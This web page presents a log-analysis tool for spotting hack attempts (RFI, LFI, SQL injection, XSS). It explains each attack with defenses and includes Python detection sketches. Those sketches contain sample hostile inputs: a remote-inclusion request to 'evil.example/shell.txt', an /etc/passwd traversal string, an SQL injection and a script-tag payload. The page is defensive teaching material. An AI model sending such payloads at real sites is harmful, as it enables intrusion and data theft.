25 Years of Programming
An open source source for C, C++, OWL, BASIC, MDB, XLS, DOT, and more...

Online calculator to identify hack attempts in website access logs

Your site, to exclude it from the RFI report. Not recommended unless needed (see Note 2):
http://www./
 

Instructions

Paste into the above box one or more complete lines from your website's HTTP access logs. Click Analyze.

The lines you copy and paste should look like the following example of a typical CLF (Combined Log Format) log line. Be sure you are copying from the correct type of log (for example, not an FTP log):

111.222.333.444 - - [01/Nov/2010:02:21:59 -0800] "GET /forum/index.php HTTP/1.1" 200 17637 "http://referersite.com/pagewithlink.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
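To check whether a pasted line has the expected shape, it can be split into its fields with a regular expression. The following is a minimal Python sketch, not the calculator's own JavaScript; the pattern, the group names, and the function name `parse_log_line` are assumptions made for illustration.

```python
import re

# Pattern for one Combined Log Format line. The group names are illustrative
# labels, not anything defined by the calculator.
COMBINED_LOG = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) '
    r'\[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" '      # quoted field, allows \" inside
    r'(?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<agent>(?:[^"\\]|\\.)*)"$'
)

def parse_log_line(line):
    """Return a dict of fields, or None if the line is not in the expected format."""
    match = COMBINED_LOG.match(line.strip())
    return match.groupdict() if match else None

example = ('111.222.333.444 - - [01/Nov/2010:02:21:59 -0800] '
           '"GET /forum/index.php HTTP/1.1" 200 17637 '
           '"http://referersite.com/pagewithlink.html" '
           '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"')
fields = parse_log_line(example)
print(fields["request"])  # GET /forum/index.php HTTP/1.1
print(fields["status"])   # 200
```

A line from the wrong kind of log (an FTP log, for example) would normally fail to match and return None.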

Where to find your access logs and how to download and unzip them are described in a related article.

There is no set limit to the number of log lines you can paste into the box. The analysis is done by JavaScript in your browser, so the limit is whatever JavaScript is able to handle (see Note 3).

If the calculator identifies hack attempts, they are classified by type and sorted into the text boxes below.

For easier viewing, copy and paste the text from each box into (preferably) a plain text editor that does not automatically turn URLs into hyperlinks. If it does create clickable links, don't click them, and don't visit the sites any other way, either. Websites mentioned in hack attempts should be considered potentially dangerous.

Description

Some of my articles about website security recommend searching your HTTP access logs for "suspicious requests", which raises the questions:

  • What does a suspicious request look like?
  • I found a line in my log that looks strange, but is it a hack attempt or not?

The previous articles had some examples and discussion, but this online calculator takes a different approach: it analyzes real-life data from your own logs and shows you which lines are hack attempts. It even classifies and sorts them by the type of hack attempt they appear to be.

Log Analysis Results

Remote File Inclusion (RFI) Attacks

An RFI attack requests one of your PHP pages (or a page that might have PHP code in it, whether the name indicates so or not). In the query string of the request, it sets a variable to a string containing the URL of a file (usually a PHP script, no matter what its name is) on a remote website. When your own PHP script attempts to use the variable, it mistakenly fetches the script from the remote site and runs it. That script runs as though it were part of your script, so it can do anything PHP can do, and it has complete access to your entire website just like your own PHP script does. That's what makes RFI attacks so dangerous.

Defenses against RFI include php.ini settings, .htaccess rules, using only the latest versions of applications like WordPress, and being especially careful to avoid RFI security holes when writing your own PHP code. More specifically: your first layer of defense should be that when your site receives an RFI attack, .htaccess refuses to process the request and sends back a 403 Forbidden response instead of the requested page. Your second layer of defense should be to have PHP configured so that allow_url_fopen or allow_url_include (preferably both) is Off, so your server will not fetch files from remote websites at all. Your third layer of defense should be to have PHP register_globals set to Off so that the variable names passed via the HTTP query string do not automatically become usable by your PHP code. Your fourth layer of defense should be that even if an RFI attack gets past .htaccess, the PHP code it is targeting has no RFI vulnerabilities, so the attack cannot succeed anyway.

Potential false positives:

  • A line is considered an RFI attack if it contains http:// or ftp:// in the request query string (everything following the first question mark in a GET request). Some websites legitimately (but usually unnecessarily) call their own pages using URLs in this format. If the part after http:// is the name of your own website, the request is not suspicious.
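The rule described above, together with the own-site exclusion, can be sketched in Python as follows. This is an illustration of the stated rule, not the calculator's actual code. The function name `looks_like_rfi` and the choice to exclude a line only when every URL in the query string points at your own site are assumptions, and percent-encoded URLs are not decoded.

```python
import re

def looks_like_rfi(request, own_site=None):
    """Flag a request whose query string contains http:// or ftp://.

    request  -- the quoted request field, e.g. 'GET /page.php?x=1 HTTP/1.1'
    own_site -- optional host name (without www.) to exclude (assumed behavior)
    """
    parts = request.split(" ")
    if len(parts) < 2 or "?" not in parts[1]:
        return False
    # Everything following the first question mark is the query string.
    query = parts[1].split("?", 1)[1].lower()
    hosts = re.findall(r"(?:http|ftp)://([^/?&#\s]*)", query)
    if not hosts:
        return False
    if own_site:
        own = {own_site.lower(), "www." + own_site.lower()}
        # Skip the line only when every URL in the query is the site's own.
        return any(host not in own for host in hosts)
    return True

print(looks_like_rfi("GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1"))
# True
print(looks_like_rfi("GET /yourpage.ext?var=http://yoursite.com/file.ext HTTP/1.1",
                     own_site="yoursite.com"))
# False
```

Checking every URL rather than only the first keeps a request flagged when it contains one reference to your own site and a second one to a remote site.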

Local File Inclusion (LFI) Attacks

An LFI attack also targets PHP pages. It tricks your PHP script into fetching important system files from your server and printing them on the output page. If it prints the contents of an encrypted password file, for example, the hacker can use fast offline cracking methods to decrypt it and then gain access to your server as one of its system users.

LFI attacks can be blocked at the .htaccess level by banning requests for a) the frequently requested system files, and b) the ./ string (which also matches ../) that they often use to traverse directories and find the location of the system file they want. At the application level, the defense is much the same as for RFI: if you absolutely must choose which file to reference in an include() command based on input you received from the visitor, don't use the incoming value directly. Instead, make a hard-coded list in your script of the possible legal values for that variable. Compare the incoming value against the list, and if it doesn't exactly match one of the values in the list, do NOT use the user-provided value in the include().
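The hard-coded list approach looks roughly like this. The sketch is in Python rather than PHP, and the page names, paths, and the decision to fall back to a default page are hypothetical; the point is only that the visitor's value selects an entry and is never used as a path itself.

```python
# Hypothetical page names and paths; in a real application these are your own files.
ALLOWED_PAGES = {
    "home": "pages/home.php",
    "contact": "pages/contact.php",
    "about": "pages/about.php",
}

def resolve_include(requested, default="home"):
    """Return a hard-coded path for an exact match, otherwise the default page."""
    # The visitor's value is only used as a lookup key, never as a file path.
    return ALLOWED_PAGES.get(requested, ALLOWED_PAGES[default])

print(resolve_include("contact"))              # pages/contact.php
print(resolve_include("../../../etc/passwd"))  # pages/home.php
```

Because only exact matches are accepted, the same check rejects both LFI paths and RFI URLs without needing to recognize either.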

Potential false positives:

  • Some non-malicious robots crawl websites using relative paths such as ./filename or ../filename. The calculator will flag these as LFI, but if the requests are only for your normal web pages and don't refer to system files like /proc/self/environ or /etc/passwd, they are not attacks.
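When reviewing the LFI box, one way to separate likely false positives from real attempts is to check whether a flagged request also names a system file. The Python sketch below is a reviewing aid under stated assumptions, not the calculator's logic: the function name, the two return labels, and the short list of system files (taken from the examples above) are all illustrative.

```python
from urllib.parse import unquote

# System files named in the text; a real list would likely be longer.
SYSTEM_FILES = ("/proc/self/environ", "/etc/passwd")

def classify_lfi(request):
    """Return 'system-file', 'traversal-only', or None for a request field."""
    parts = request.split(" ")
    # Decode percent-escapes so that %2e%2e%2f is seen as ../
    target = unquote(parts[1]) if len(parts) > 1 else ""
    if any(name in target for name in SYSTEM_FILES):
        return "system-file"
    if "./" in target:          # also matches ../
        return "traversal-only"
    return None

print(classify_lfi("GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1"))
# system-file
print(classify_lfi("GET /./about.html HTTP/1.1"))
# traversal-only
```

Lines labeled traversal-only still deserve a look, but they are the ones most likely to come from harmless robots.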

SQL Injection Attacks

An SQL Injection attack contains SQL code in the request. SQL is a language for transferring data to and from a database. PHP or ASP code often takes data input provided by the website visitor and combines it with SQL template code to form a database query which it sends to the database. If it uses an insecure method to combine the two, then the input provided by the visitor, instead of being just data, can be interpreted as SQL code. If it actually is SQL code, the commands it contains will be executed on the database. It can corrupt the database, enter malicious data into it, delete it entirely, or dump its contents on the web page. The attacker doesn't need to know the database username/password because the script they are hijacking already knows them.

SQL Injection attacks can be blocked at the .htaccess level by banning a) certain SQL keywords or combinations of them that don't occur in your legitimate filenames/URLs, and b) punctuation and other special characters common in SQL Injection attacks that don't occur in your legitimate filenames/URLs. Your next, and more common, layer of defense is to keep all your applications such as WordPress updated to their latest versions so that if an SQL Injection vulnerability is found in the code, you receive the improved version as quickly as possible. If you write your own database connection code, guard against SQL Injection by passing visitor input to the database as parameters of a prepared statement instead of concatenating it into the SQL text.
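The difference between the insecure and the secure way of combining visitor input with SQL can be seen in a small experiment. This sketch uses Python's built-in sqlite3 module with an in-memory database; the table, the data, and the injection string are made up for illustration, and PHP code would use its own database library's prepared statements instead.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'alice@example.com')")

visitor_input = "nobody' OR '1'='1"   # a typical injection attempt

# Insecure: the input is pasted into the SQL text and changes the query's logic.
unsafe_sql = "SELECT email FROM users WHERE name = '" + visitor_input + "'"
unsafe_rows = conn.execute(unsafe_sql).fetchall()

# Safer: the ? placeholder keeps the input as data, never as SQL code.
safe_rows = conn.execute(
    "SELECT email FROM users WHERE name = ?", (visitor_input,)
).fetchall()

print(len(unsafe_rows))  # 1 (the injected OR clause matched every row)
print(len(safe_rows))    # 0 (no user has that literal name)
```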

Log File or Statistics Analyzer Attacks

In contrast to an RFI attack, which contains a reference to an external PHP file on a remote website, these attacks contain actual snippets of PHP or HTML code. The intent is that a program that either handles the request or puts it onto an output page will inadvertently either run the PHP code or place the HTML hyperlink on a report page without sanitizing it to make it plain text. The amount of code they can put in the request is limited, so it usually does something simple like echo a "Success" message so the hacker can tell whether the injection worked or not. 

Also assigned to this category are lines that contain one or more quotation marks that are escaped with a backslash (example: \"). When a legitimate request contains a quotation mark, it is usually encoded in a way that avoids using an actual quotation mark character. In a CLF log file, quotation marks are the delimiters for some of the fields. When a real quotation mark is received, it is typically escaped in the log with a backslash, which avoids getting that quote confused with the delimiter quotes. However, some people send HTTP requests containing embedded backslashes in carefully chosen locations with the intent of causing the delimiter quotes to be escaped (or internal quotes not to be escaped), thus corrupting the log and making it more difficult to parse or import into a database.

Cross-site Scripting (XSS) Attacks

In a cross-site scripting attack, someone creates a hyperlink to one of your pages. In the hyperlink is a snippet of JavaScript. They hope your page will echo the snippet directly to the page without sanitizing it (without converting special characters to HTML entities), in which case the JavaScript will run when someone loads the page.

The entries in this box are usually tests to determine whether your page has an XSS vulnerability. When they get the result page, they can see whether their JavaScript snippet was executed. If it was, they will craft and place their malicious link somewhere, and try to get people to click on it.

The ways to avoid XSS vulnerabilities are: 1) keep web applications updated to their latest versions, 2) in your own code, whenever you receive text from a user and echo it back onto a page, pass it through the PHP htmlentities() function (or equivalent) first. This will, for example, put "<script" onto a page as "&lt;script". A browser receiving "<script" thinks it is supposed to run the script, but when it receives "&lt;script", it knows without confusion that it's supposed to put the text on the page.  
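The effect of converting special characters to entities can be shown with Python's standard html.escape function, used here as a rough stand-in for the PHP function mentioned above (it covers the characters that matter for this example, not the full entity table). The wrapper name `echo_safely` is an assumption.

```python
import html

def echo_safely(user_text):
    """Convert HTML special characters to entities before echoing user text."""
    return html.escape(user_text, quote=True)

print(echo_safely('<script>alert("x")</script>'))
# &lt;script&gt;alert(&quot;x&quot;)&lt;/script&gt;
```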

Miscellaneous Attacks

Other requests that the calculator considers suspicious. Some examples:

  • Suspicious characters "catch-all": The request contains encoded carriage returns, line feeds, or null bytes, which are not supposed to be in an HTTP request string. The intent is usually to make the server mishandle the request. Or the request contains punctuation characters that are frequently used for malicious purposes, such as: [] {} () <> ' " * \  The calculator is aggressive about flagging these characters even though they are legitimate ones which can be, and often are, used in URL filenames or query string data. If your URLs normally contain these characters, this box will contain a lot of false positives.
  • User-agent = "libwww-perl" or "core-project". There's nothing inherently suspicious about these requests except that in my experience these user agents are usually up to no good.
  • The HTTP PUT method puts a file directly on your server. Very suspicious. Not the method that most webmasters normally use.
  • The string ".htaccess" does not normally appear in web requests unless you use something like CKEditor or TinyMCE to edit it. Or unless a hacker is using a web shell to edit it.
  • At some webhosts, your initial entry to your cPanel is recorded in your access logs (your subsequent activity there is not). If there are /cpanel log entries from IP addresses other than yours, someone else is trying to log in as you. There is no way to tell from the log whether they succeeded.
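A few of the checks in the list above can be sketched in Python as simple string tests. This is a guess at the general idea rather than the calculator's actual rules: the function name, the reason strings, and the assumption that "encoded" control characters appear as %0d, %0a, and %00 are all illustrative.

```python
import re

# Assumed percent-encoded forms of carriage return, line feed, and null byte.
ENCODED_CONTROL = re.compile(r"%0d|%0a|%00", re.IGNORECASE)
SUSPECT_AGENTS = ("libwww-perl", "core-project")

def misc_reasons(method, url, agent):
    """Return a list of reasons a request looks suspicious (empty if none)."""
    reasons = []
    if ENCODED_CONTROL.search(url):
        reasons.append("encoded CR, LF, or null byte")
    if any(name in agent.lower() for name in SUSPECT_AGENTS):
        reasons.append("suspect user agent")
    if method.upper() == "PUT":
        reasons.append("PUT method")
    if ".htaccess" in url.lower():
        reasons.append(".htaccess in request")
    return reasons

print(misc_reasons("GET", "/index.php?id=1%00", "libwww-perl/5.805"))
# ['encoded CR, LF, or null byte', 'suspect user agent']
```

Returning the reasons instead of a plain yes/no makes it easier to judge whether a flagged line is a false positive.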

Not Attacks

These are the log entries that were not classified as attacks. If any of the lines that land in this box actually are malicious, it means I need to revise the calculator to catch them and assign them an attack type. The reason this box is on the page is to make those types of errors easier to spot.

Notes

  1. Displaying the non-malicious requests is optional because the amount of memory needed to store them for display can be significant if you are processing many lines of log entries. Most requests are non-malicious.
     
  2. If the RFI Attacks report shows many false positives because there are log entries with a format like:
    GET /yourpage.ext?var=http://yoursite.com/file.ext,
    you can enter the name of your website in the box provided. Lines matching your own website (with and without www.) will be excluded from the RFI Attacks report. When an exclusion is in effect, there is a small possibility that some actual RFI attacks might fail to be reported, such as if the URL has two http:// references, one to your own site and a second one to a real attack site. It's best not to use the exclusion option unless you really need it.
     
  3. Using Firefox 4 on my computer, the calculator can handle at least 16,000 log lines at a time. The slowest part of the operation is pasting the text into the input box. I tried pasting 360,000 lines (95 MB), but after 15 minutes the paste hadn't even finished and I gave up waiting. Internet Explorer 8 is much slower and gives the appearance of becoming unstable and unresponsive even if it will, eventually, complete successfully. I'd suggest limiting IE to 1,000 lines at a time.
     
  4. When using log analysis as the basis for crafting .htaccess ban rules, it is important to test your prospective new rules against entries from your old access logs to make sure they won't also ban legitimate requests. One way is to load the log into a database program and run your rules as regular expression searches on the database. Then examine which lines would have been banned by the rule. If legitimate requests would have been banned, adjust the rule. Then, after putting new rules into effect on your server, it's important to watch your logs closely (and cPanel > Latest Visitors, for a real-time view) to make sure legitimate requests are not being refused.
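The testing step in note 4 does not strictly need a database program. A short script can run a prospective rule over old log lines and list what it would have banned. The Python sketch below assumes the rule can be written as a regular expression; the function name, the sample pattern, and the two log lines are made up for illustration, and Python's regular expression syntax is not identical to the one your web server uses, so a rule that passes here should still be retested on the server.

```python
import re

def preview_ban_rule(pattern, log_lines):
    """Return the log lines a regular-expression ban rule would have matched."""
    rule = re.compile(pattern, re.IGNORECASE)
    return [line for line in log_lines if rule.search(line)]

# Made-up sample lines standing in for an old access log.
old_log = [
    '1.2.3.4 - - [01/Nov/2010:02:21:59 -0800] '
    '"GET /index.php?page=http://evil.example/x.txt HTTP/1.1" 200 17637 '
    '"-" "libwww-perl/5.805"',
    '5.6.7.8 - - [01/Nov/2010:02:22:10 -0800] '
    '"GET /forum/index.php HTTP/1.1" 200 17637 "-" "Mozilla/4.0"',
]

# Hypothetical rule: a query-string value that starts with http:// or ftp://
banned = preview_ban_rule(r"\?.*=(?:http|ftp)://", old_log)
for line in banned:
    print(line)   # review each one: is it really a request you want refused?
```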
     

Bug reports, feature suggestions, comments, questions can be submitted in the discussion forum.


Hack Attempt Identifier - Perl script

For frequent use or for processing large log files, this Perl script that you run from the command line is faster, easier, and more efficient. It reads one or more log files that you specify and sorts the hack attempts into separate output files.

You must have the Perl language installed on your PC to run this script. Perl is useful for utility and text processing tasks like this one. I developed and tested this script with Perl 5.10.0 in Ubuntu Linux and with ActivePerl 5.10.1 in Windows.

Example usage:

perl -WT HackAttemptIdentifier.pl -x"mysite.com" -n logfile1...

Options: 
-x|--exclude"website.com"  Exclude your own website from tests for RFI
-n|--shownonmalicious      Also write non-hack lines to a file
-h|--help                  Show this help and exit

It creates the following plain text output files in the current working directory:

Identified-RFI.log
Identified-LFI.log
Identified-SQLINJECTION.log
Identified-XSS.log
Identified-LOGPGM.log
Identified-MISC.log
Identified-NONMALICIOUS.log

It uses this Perl module:

use Getopt::Long;

The program's code structure and formatting are more like typical C++ formatting than typical Perl formatting.

Download: US$8.00 (22 KB)

The zip file contains 3 versions of the script. The only difference between them is the line endings:
Linux=LF, Windows=CRLF, Mac=CR. Rename the version you want to use to HackAttemptIdentifier.pl.

The Buy Now button goes to the PayPal website:

  • If you pay from your PayPal account, PayPal automatically redirects you to my download page.
     
  • If you pay with a credit card, the redirect to my download page is not automatic. You will see a "Return to Merchant" button/link on the last PayPal confirmation page. Click that link to go to my download page.
     
  • If you cancel the transaction at PayPal with their "Cancel and return to [my email address]" link, you will return to this page you are reading now instead of going to the download page.

 
